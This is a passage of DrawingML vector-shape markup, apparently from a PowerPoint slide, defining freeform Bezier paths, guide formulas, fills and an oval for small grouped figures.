                      <a:pt x="108" y="23"/>
                      <a:pt x="108" y="22"/>
                      <a:pt x="108" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="21"/>
                      <a:pt x="108" y="19"/>
                      <a:pt x="108" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="17"/>
                      <a:pt x="108" y="17"/>
                      <a:pt x="108" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="16"/>
                      <a:pt x="108" y="16"/>
                      <a:pt x="108" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="4"/>
                      <a:pt x="95" y="8"/>
                      <a:pt x="89" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="6"/>
                      <a:pt x="73" y="0"/>
                      <a:pt x="64" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="3"/>
                      <a:pt x="57" y="4"/>
                      <a:pt x="57" y="4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67"/>
                      <a:pt x="62" y="109"/>
                      <a:pt x="62" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="138"/>
                      <a:pt x="89" y="140"/>
                      <a:pt x="101" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="126"/>
                      <a:pt x="108" y="122"/>
                      <a:pt x="108" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="101"/>
                      <a:pt x="107" y="69"/>
                      <a:pt x="108" y="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50000">
                    <a:srgbClr val="FFFFFF">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:srgbClr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00" name="Freeform 1789">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{43967FBD-25AF-4C1D-AB0A-ECCD36CB9D1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18" y="1435"/>
                <a:ext cx="267" cy="226"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 197"/>
                  <a:gd name="T1" fmla="*/ 44 h 167"/>
                  <a:gd name="T2" fmla="*/ 196 w 197"/>
                  <a:gd name="T3" fmla="*/ 37 h 167"/>
                  <a:gd name="T4" fmla="*/ 177 w 197"/>
                  <a:gd name="T5" fmla="*/ 18 h 167"/>
                  <a:gd name="T6" fmla="*/ 137 w 197"/>
                  <a:gd name="T7" fmla="*/ 25 h 167"/>
                  <a:gd name="T8" fmla="*/ 99 w 197"/>
                  <a:gd name="T9" fmla="*/ 35 h 167"/>
                  <a:gd name="T10" fmla="*/ 99 w 197"/>
                  <a:gd name="T11" fmla="*/ 52 h 167"/>
                  <a:gd name="T12" fmla="*/ 99 w 197"/>
                  <a:gd name="T13" fmla="*/ 35 h 167"/>
                  <a:gd name="T14" fmla="*/ 99 w 197"/>
                  <a:gd name="T15" fmla="*/ 35 h 167"/>
                  <a:gd name="T16" fmla="*/ 99 w 197"/>
                  <a:gd name="T17" fmla="*/ 2 h 167"/>
                  <a:gd name="T18" fmla="*/ 89 w 197"/>
                  <a:gd name="T19" fmla="*/ 14 h 167"/>
                  <a:gd name="T20" fmla="*/ 2 w 197"/>
                  <a:gd name="T21" fmla="*/ 8 h 167"/>
                  <a:gd name="T22" fmla="*/ 2 w 197"/>
                  <a:gd name="T23" fmla="*/ 10 h 167"/>
                  <a:gd name="T24" fmla="*/ 2 w 197"/>
                  <a:gd name="T25" fmla="*/ 31 h 167"/>
                  <a:gd name="T26" fmla="*/ 12 w 197"/>
                  <a:gd name="T27" fmla="*/ 67 h 167"/>
                  <a:gd name="T28" fmla="*/ 70 w 197"/>
                  <a:gd name="T29" fmla="*/ 83 h 167"/>
                  <a:gd name="T30" fmla="*/ 83 w 197"/>
                  <a:gd name="T31" fmla="*/ 82 h 167"/>
                  <a:gd name="T32" fmla="*/ 149 w 197"/>
                  <a:gd name="T33" fmla="*/ 65 h 167"/>
                  <a:gd name="T34" fmla="*/ 150 w 197"/>
                  <a:gd name="T35" fmla="*/ 137 h 167"/>
                  <a:gd name="T36" fmla="*/ 150 w 197"/>
                  <a:gd name="T37" fmla="*/ 141 h 167"/>
                  <a:gd name="T38" fmla="*/ 197 w 197"/>
                  <a:gd name="T39" fmla="*/ 140 h 167"/>
                  <a:gd name="T40" fmla="*/ 196 w 197"/>
                  <a:gd name="T41" fmla="*/ 4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7" h="167">
                    <a:moveTo>
                      <a:pt x="196" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="44"/>
                      <a:pt x="196" y="40"/>
                      <a:pt x="196" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="23"/>
                      <a:pt x="183" y="19"/>
                      <a:pt x="177" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="17"/>
                      <a:pt x="137" y="25"/>
                      <a:pt x="137" y="2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20"/>
                      <a:pt x="99" y="4"/>
                      <a:pt x="99" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="8"/>
                      <a:pt x="95" y="13"/>
                      <a:pt x="89" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="16"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="2" y="8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55"/>
                      <a:pt x="0" y="64"/>
                      <a:pt x="12" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="69"/>
                      <a:pt x="66" y="82"/>
                      <a:pt x="70" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="83"/>
                      <a:pt x="78" y="84"/>
                      <a:pt x="83" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="78"/>
                      <a:pt x="127" y="71"/>
                      <a:pt x="149" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="137"/>
                      <a:pt x="150" y="137"/>
                      <a:pt x="150" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="138"/>
                      <a:pt x="150" y="140"/>
                      <a:pt x="150" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="167"/>
                      <a:pt x="196" y="163"/>
                      <a:pt x="197" y="140"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="125"/>
                      <a:pt x="196" y="60"/>
                      <a:pt x="196" y="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50000">
                    <a:srgbClr val="FFFFFF">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:srgbClr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01" name="Freeform 1790">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04B20E4C-F548-4370-B9EB-CEA88F1EF9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63" y="1229"/>
                <a:ext cx="343" cy="269"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 209 w 254"/>
                  <a:gd name="T1" fmla="*/ 119 h 200"/>
                  <a:gd name="T2" fmla="*/ 184 w 254"/>
                  <a:gd name="T3" fmla="*/ 127 h 200"/>
                  <a:gd name="T4" fmla="*/ 173 w 254"/>
                  <a:gd name="T5" fmla="*/ 55 h 200"/>
                  <a:gd name="T6" fmla="*/ 144 w 254"/>
                  <a:gd name="T7" fmla="*/ 27 h 200"/>
                  <a:gd name="T8" fmla="*/ 96 w 254"/>
                  <a:gd name="T9" fmla="*/ 14 h 200"/>
                  <a:gd name="T10" fmla="*/ 51 w 254"/>
                  <a:gd name="T11" fmla="*/ 2 h 200"/>
                  <a:gd name="T12" fmla="*/ 18 w 254"/>
                  <a:gd name="T13" fmla="*/ 13 h 200"/>
                  <a:gd name="T14" fmla="*/ 3 w 254"/>
                  <a:gd name="T15" fmla="*/ 96 h 200"/>
                  <a:gd name="T16" fmla="*/ 3 w 254"/>
                  <a:gd name="T17" fmla="*/ 96 h 200"/>
                  <a:gd name="T18" fmla="*/ 2 w 254"/>
                  <a:gd name="T19" fmla="*/ 99 h 200"/>
                  <a:gd name="T20" fmla="*/ 2 w 254"/>
                  <a:gd name="T21" fmla="*/ 99 h 200"/>
                  <a:gd name="T22" fmla="*/ 9 w 254"/>
                  <a:gd name="T23" fmla="*/ 118 h 200"/>
                  <a:gd name="T24" fmla="*/ 26 w 254"/>
                  <a:gd name="T25" fmla="*/ 119 h 200"/>
                  <a:gd name="T26" fmla="*/ 33 w 254"/>
                  <a:gd name="T27" fmla="*/ 117 h 200"/>
                  <a:gd name="T28" fmla="*/ 33 w 254"/>
                  <a:gd name="T29" fmla="*/ 117 h 200"/>
                  <a:gd name="T30" fmla="*/ 36 w 254"/>
                  <a:gd name="T31" fmla="*/ 116 h 200"/>
                  <a:gd name="T32" fmla="*/ 43 w 254"/>
                  <a:gd name="T33" fmla="*/ 114 h 200"/>
                  <a:gd name="T34" fmla="*/ 44 w 254"/>
                  <a:gd name="T35" fmla="*/ 76 h 200"/>
                  <a:gd name="T36" fmla="*/ 41 w 254"/>
                  <a:gd name="T37" fmla="*/ 77 h 200"/>
                  <a:gd name="T38" fmla="*/ 44 w 254"/>
                  <a:gd name="T39" fmla="*/ 53 h 200"/>
                  <a:gd name="T40" fmla="*/ 43 w 254"/>
                  <a:gd name="T41" fmla="*/ 171 h 200"/>
                  <a:gd name="T42" fmla="*/ 53 w 254"/>
                  <a:gd name="T43" fmla="*/ 183 h 200"/>
                  <a:gd name="T44" fmla="*/ 111 w 254"/>
                  <a:gd name="T45" fmla="*/ 199 h 200"/>
                  <a:gd name="T46" fmla="*/ 140 w 254"/>
                  <a:gd name="T47" fmla="*/ 177 h 200"/>
                  <a:gd name="T48" fmla="*/ 140 w 254"/>
                  <a:gd name="T49" fmla="*/ 171 h 200"/>
                  <a:gd name="T50" fmla="*/ 140 w 254"/>
                  <a:gd name="T51" fmla="*/ 139 h 200"/>
                  <a:gd name="T52" fmla="*/ 139 w 254"/>
                  <a:gd name="T53" fmla="*/ 98 h 200"/>
                  <a:gd name="T54" fmla="*/ 137 w 254"/>
                  <a:gd name="T55" fmla="*/ 84 h 200"/>
                  <a:gd name="T56" fmla="*/ 136 w 254"/>
                  <a:gd name="T57" fmla="*/ 79 h 200"/>
                  <a:gd name="T58" fmla="*/ 137 w 254"/>
                  <a:gd name="T59" fmla="*/ 84 h 200"/>
                  <a:gd name="T60" fmla="*/ 139 w 254"/>
                  <a:gd name="T61" fmla="*/ 98 h 200"/>
                  <a:gd name="T62" fmla="*/ 145 w 254"/>
                  <a:gd name="T63" fmla="*/ 136 h 200"/>
                  <a:gd name="T64" fmla="*/ 145 w 254"/>
                  <a:gd name="T65" fmla="*/ 137 h 200"/>
                  <a:gd name="T66" fmla="*/ 145 w 254"/>
                  <a:gd name="T67" fmla="*/ 137 h 200"/>
                  <a:gd name="T68" fmla="*/ 145 w 254"/>
                  <a:gd name="T69" fmla="*/ 142 h 200"/>
                  <a:gd name="T70" fmla="*/ 155 w 254"/>
                  <a:gd name="T71" fmla="*/ 165 h 200"/>
                  <a:gd name="T72" fmla="*/ 170 w 254"/>
                  <a:gd name="T73" fmla="*/ 171 h 200"/>
                  <a:gd name="T74" fmla="*/ 223 w 254"/>
                  <a:gd name="T75" fmla="*/ 155 h 200"/>
                  <a:gd name="T76" fmla="*/ 209 w 254"/>
                  <a:gd name="T77" fmla="*/ 119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4" h="200">
                    <a:moveTo>
                      <a:pt x="209" y="119"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="207" y="121"/>
                      <a:pt x="197" y="123"/>
                      <a:pt x="184" y="127"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="179" y="94"/>
                      <a:pt x="175" y="64"/>
                      <a:pt x="173" y="55"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="170" y="36"/>
                      <a:pt x="153" y="30"/>
                      <a:pt x="144" y="27"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="23"/>
                      <a:pt x="110" y="18"/>
                      <a:pt x="96" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="83" y="10"/>
                      <a:pt x="61" y="4"/>
                      <a:pt x="51" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="41" y="0"/>
                      <a:pt x="21" y="4"/>
                      <a:pt x="18" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="16" y="16"/>
                      <a:pt x="10" y="56"/>
                      <a:pt x="3" y="96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0" y="109"/>
                      <a:pt x="4" y="116"/>
                      <a:pt x="9" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="121"/>
                      <a:pt x="20" y="120"/>
                      <a:pt x="26" y="119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34" y="117"/>
                      <a:pt x="35" y="117"/>
                      <a:pt x="36" y="116"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="38" y="116"/>
                      <a:pt x="41" y="115"/>
                      <a:pt x="43" y="114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3" y="76"/>
                      <a:pt x="42" y="77"/>
                      <a:pt x="41" y="77"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="43" y="60"/>
                      <a:pt x="44" y="49"/>
                      <a:pt x="44" y="53"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="59"/>
                      <a:pt x="43" y="123"/>
                      <a:pt x="43" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="44" y="177"/>
                      <a:pt x="47" y="182"/>
                      <a:pt x="53" y="183"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="67" y="186"/>
                      <a:pt x="102" y="197"/>
                      <a:pt x="111" y="199"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="120" y="200"/>
                      <a:pt x="138" y="190"/>
                      <a:pt x="140" y="177"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="175"/>
                      <a:pt x="140" y="173"/>
                      <a:pt x="140" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="139"/>
                      <a:pt x="140" y="139"/>
                      <a:pt x="140" y="139"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="124"/>
                      <a:pt x="140" y="111"/>
                      <a:pt x="139" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="92"/>
                      <a:pt x="137" y="87"/>
                      <a:pt x="137" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="82"/>
                      <a:pt x="136" y="80"/>
                      <a:pt x="136" y="79"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="136" y="80"/>
                      <a:pt x="136" y="82"/>
                      <a:pt x="137" y="84"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="138" y="88"/>
                      <a:pt x="138" y="93"/>
                      <a:pt x="139" y="98"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="140" y="108"/>
                      <a:pt x="142" y="120"/>
                      <a:pt x="145" y="136"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="136"/>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                      <a:pt x="145" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="145" y="142"/>
                      <a:pt x="145" y="142"/>
                      <a:pt x="145" y="142"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="148" y="154"/>
                      <a:pt x="151" y="161"/>
                      <a:pt x="155" y="165"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="159" y="169"/>
                      <a:pt x="164" y="170"/>
                      <a:pt x="170" y="171"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="186" y="167"/>
                      <a:pt x="204" y="161"/>
                      <a:pt x="223" y="155"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="254" y="147"/>
                      <a:pt x="236" y="110"/>
                      <a:pt x="209" y="119"/>
                    </a:cubicBezTo>
                    <a:close/>
                  </a:path>
                </a:pathLst>
              </a:custGeom>
              <a:solidFill>
                <a:srgbClr val="C0C0C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02" name="Freeform 1791">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1447CD1C-52E4-4D54-A6BC-B718F3313B2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40" y="1214"/>
                <a:ext cx="89" cy="56"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 30 w 66"/>
                  <a:gd name="T1" fmla="*/ 39 h 41"/>
                  <a:gd name="T2" fmla="*/ 10 w 66"/>
                  <a:gd name="T3" fmla="*/ 23 h 41"/>
                  <a:gd name="T4" fmla="*/ 16 w 66"/>
                  <a:gd name="T5" fmla="*/ 13 h 41"/>
                  <a:gd name="T6" fmla="*/ 54 w 66"/>
                  <a:gd name="T7" fmla="*/ 16 h 41"/>
                  <a:gd name="T8" fmla="*/ 57 w 66"/>
                  <a:gd name="T9" fmla="*/ 29 h 41"/>
                  <a:gd name="T10" fmla="*/ 30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30" y="39"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="14" y="37"/>
                      <a:pt x="0" y="25"/>
                      <a:pt x="10" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="17" y="21"/>
                      <a:pt x="13" y="16"/>
                      <a:pt x="16" y="13"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="10"/>
                      <a:pt x="54" y="0"/>
                      <a:pt x="54" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="54" y="21"/>
                      <a:pt x="47" y="25"/>
                      <a:pt x="57" y="29"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="66" y="33"/>
                      <a:pt x="46" y="41"/>
                      <a:pt x="30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03" name="Oval 1792">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87EA9BF4-DF40-4511-B36D-D9C8183362FA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 flipH="1">
                <a:off x="2429" y="1132"/>
                <a:ext cx="119" cy="119"/>
              </a:xfrm>
              <a:prstGeom prst="ellipse">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FFCC99"/>
              </a:solidFill>
              <a:ln w="6350" algn="ctr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612" name="Group 1793">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9BABD49A-410D-46F4-8E29-2E77CABC61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31774" y="1841174"/>
              <a:ext cx="246064" cy="382586"/>
              <a:chOff x="2363" y="1132"/>
              <a:chExt cx="343" cy="529"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1994" name="Freeform 1794">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{08EC4B5A-086E-47BE-82BF-C5A3EF3FFED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74" y="1449"/>
                <a:ext cx="145" cy="189"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 108 w 108"/>
                  <a:gd name="T1" fmla="*/ 36 h 140"/>
                  <a:gd name="T2" fmla="*/ 108 w 108"/>
                  <a:gd name="T3" fmla="*/ 35 h 140"/>
                  <a:gd name="T4" fmla="*/ 108 w 108"/>
                  <a:gd name="T5" fmla="*/ 28 h 140"/>
                  <a:gd name="T6" fmla="*/ 108 w 108"/>
                  <a:gd name="T7" fmla="*/ 23 h 140"/>
                  <a:gd name="T8" fmla="*/ 108 w 108"/>
                  <a:gd name="T9" fmla="*/ 22 h 140"/>
                  <a:gd name="T10" fmla="*/ 108 w 108"/>
                  <a:gd name="T11" fmla="*/ 17 h 140"/>
                  <a:gd name="T12" fmla="*/ 108 w 108"/>
                  <a:gd name="T13" fmla="*/ 16 h 140"/>
                  <a:gd name="T14" fmla="*/ 108 w 108"/>
                  <a:gd name="T15" fmla="*/ 16 h 140"/>
                  <a:gd name="T16" fmla="*/ 89 w 108"/>
                  <a:gd name="T17" fmla="*/ 7 h 140"/>
                  <a:gd name="T18" fmla="*/ 64 w 108"/>
                  <a:gd name="T19" fmla="*/ 2 h 140"/>
                  <a:gd name="T20" fmla="*/ 57 w 108"/>
                  <a:gd name="T21" fmla="*/ 4 h 140"/>
                  <a:gd name="T22" fmla="*/ 49 w 108"/>
                  <a:gd name="T23" fmla="*/ 6 h 140"/>
                  <a:gd name="T24" fmla="*/ 49 w 108"/>
                  <a:gd name="T25" fmla="*/ 6 h 140"/>
                  <a:gd name="T26" fmla="*/ 0 w 108"/>
                  <a:gd name="T27" fmla="*/ 18 h 140"/>
                  <a:gd name="T28" fmla="*/ 29 w 108"/>
                  <a:gd name="T29" fmla="*/ 47 h 140"/>
                  <a:gd name="T30" fmla="*/ 62 w 108"/>
                  <a:gd name="T31" fmla="*/ 40 h 140"/>
                  <a:gd name="T32" fmla="*/ 62 w 108"/>
                  <a:gd name="T33" fmla="*/ 118 h 140"/>
                  <a:gd name="T34" fmla="*/ 101 w 108"/>
                  <a:gd name="T35" fmla="*/ 129 h 140"/>
                  <a:gd name="T36" fmla="*/ 108 w 108"/>
                  <a:gd name="T37" fmla="*/ 117 h 140"/>
                  <a:gd name="T38" fmla="*/ 108 w 108"/>
                  <a:gd name="T39" fmla="*/ 36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8" h="140">
                    <a:moveTo>
                      <a:pt x="108" y="36"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="36"/>
                      <a:pt x="108" y="36"/>
                      <a:pt x="108" y="35"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="33"/>
                      <a:pt x="108" y="30"/>
                      <a:pt x="108" y="28"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="28"/>
                      <a:pt x="108" y="26"/>
                      <a:pt x="108" y="23"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="23"/>
                      <a:pt x="108" y="22"/>
                      <a:pt x="108" y="22"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="21"/>
                      <a:pt x="108" y="19"/>
                      <a:pt x="108" y="17"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="17"/>
                      <a:pt x="108" y="17"/>
                      <a:pt x="108" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="16"/>
                      <a:pt x="108" y="16"/>
                      <a:pt x="108" y="16"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="4"/>
                      <a:pt x="95" y="8"/>
                      <a:pt x="89" y="7"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="85" y="6"/>
                      <a:pt x="73" y="0"/>
                      <a:pt x="64" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="60" y="3"/>
                      <a:pt x="57" y="4"/>
                      <a:pt x="57" y="4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67"/>
                      <a:pt x="62" y="109"/>
                      <a:pt x="62" y="118"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="63" y="138"/>
                      <a:pt x="89" y="140"/>
                      <a:pt x="101" y="129"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="105" y="126"/>
                      <a:pt x="108" y="122"/>
                      <a:pt x="108" y="117"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="108" y="101"/>
                      <a:pt x="107" y="69"/>
                      <a:pt x="108" y="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50000">
                    <a:srgbClr val="FFFFFF">
                      <a:gamma/>
                      <a:shade val="85882"/>
                      <a:invGamma/>
                    </a:srgbClr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5" name="Freeform 1795">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24042C9E-E8A5-4339-9606-81737EE3C6D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18" y="1435"/>
                <a:ext cx="267" cy="226"/>
              </a:xfrm>
              <a:custGeom>
                <a:avLst/>
                <a:gdLst>
                  <a:gd name="T0" fmla="*/ 196 w 197"/>
                  <a:gd name="T1" fmla="*/ 44 h 167"/>
                  <a:gd name="T2" fmla="*/ 196 w 197"/>
                  <a:gd name="T3" fmla="*/ 37 h 167"/>
                  <a:gd name="T4" fmla="*/ 177 w 197"/>
                  <a:gd name="T5" fmla="*/ 18 h 167"/>
                  <a:gd name="T6" fmla="*/ 137 w 197"/>
                  <a:gd name="T7" fmla="*/ 25 h 167"/>
                  <a:gd name="T8" fmla="*/ 99 w 197"/>
                  <a:gd name="T9" fmla="*/ 35 h 167"/>
                  <a:gd name="T10" fmla="*/ 99 w 197"/>
                  <a:gd name="T11" fmla="*/ 52 h 167"/>
                  <a:gd name="T12" fmla="*/ 99 w 197"/>
                  <a:gd name="T13" fmla="*/ 35 h 167"/>
                  <a:gd name="T14" fmla="*/ 99 w 197"/>
                  <a:gd name="T15" fmla="*/ 35 h 167"/>
                  <a:gd name="T16" fmla="*/ 99 w 197"/>
                  <a:gd name="T17" fmla="*/ 2 h 167"/>
                  <a:gd name="T18" fmla="*/ 89 w 197"/>
                  <a:gd name="T19" fmla="*/ 14 h 167"/>
                  <a:gd name="T20" fmla="*/ 2 w 197"/>
                  <a:gd name="T21" fmla="*/ 8 h 167"/>
                  <a:gd name="T22" fmla="*/ 2 w 197"/>
                  <a:gd name="T23" fmla="*/ 10 h 167"/>
                  <a:gd name="T24" fmla="*/ 2 w 197"/>
                  <a:gd name="T25" fmla="*/ 31 h 167"/>
                  <a:gd name="T26" fmla="*/ 12 w 197"/>
                  <a:gd name="T27" fmla="*/ 67 h 167"/>
                  <a:gd name="T28" fmla="*/ 70 w 197"/>
                  <a:gd name="T29" fmla="*/ 83 h 167"/>
                  <a:gd name="T30" fmla="*/ 83 w 197"/>
                  <a:gd name="T31" fmla="*/ 82 h 167"/>
                  <a:gd name="T32" fmla="*/ 149 w 197"/>
                  <a:gd name="T33" fmla="*/ 65 h 167"/>
                  <a:gd name="T34" fmla="*/ 150 w 197"/>
                  <a:gd name="T35" fmla="*/ 137 h 167"/>
                  <a:gd name="T36" fmla="*/ 150 w 197"/>
                  <a:gd name="T37" fmla="*/ 141 h 167"/>
                  <a:gd name="T38" fmla="*/ 197 w 197"/>
                  <a:gd name="T39" fmla="*/ 140 h 167"/>
                  <a:gd name="T40" fmla="*/ 196 w 197"/>
                  <a:gd name="T41" fmla="*/ 4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7" h="167">
                    <a:moveTo>
                      <a:pt x="196" y="44"/>
                    </a:moveTo>
                    <a:cubicBezTo>
                      <a:pt x="196" y="44"/>
                      <a:pt x="196" y="40"/>
                      <a:pt x="196" y="37"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="193" y="23"/>
                      <a:pt x="183" y="19"/>
                      <a:pt x="177" y="18"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="168" y="17"/>
                      <a:pt x="137" y="25"/>
                      <a:pt x="137" y="2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20"/>
                      <a:pt x="99" y="4"/>
                      <a:pt x="99" y="2"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="98" y="8"/>
                      <a:pt x="95" y="13"/>
                      <a:pt x="89" y="14"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="80" y="16"/>
                      <a:pt x="0" y="0"/>
                      <a:pt x="2" y="8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55"/>
                      <a:pt x="0" y="64"/>
                      <a:pt x="12" y="67"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="18" y="69"/>
                      <a:pt x="66" y="82"/>
                      <a:pt x="70" y="83"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="73" y="83"/>
                      <a:pt x="78" y="84"/>
                      <a:pt x="83" y="82"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="97" y="78"/>
                      <a:pt x="127" y="71"/>
                      <a:pt x="149" y="65"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="137"/>
                      <a:pt x="150" y="137"/>
                      <a:pt x="150" y="137"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="150" y="138"/>
                      <a:pt x="150" y="140"/>
                      <a:pt x="150" y="141"/>
                    </a:cubicBezTo>
                    <a:cubicBezTo>
                      <a:pt x="151" y="167"/>
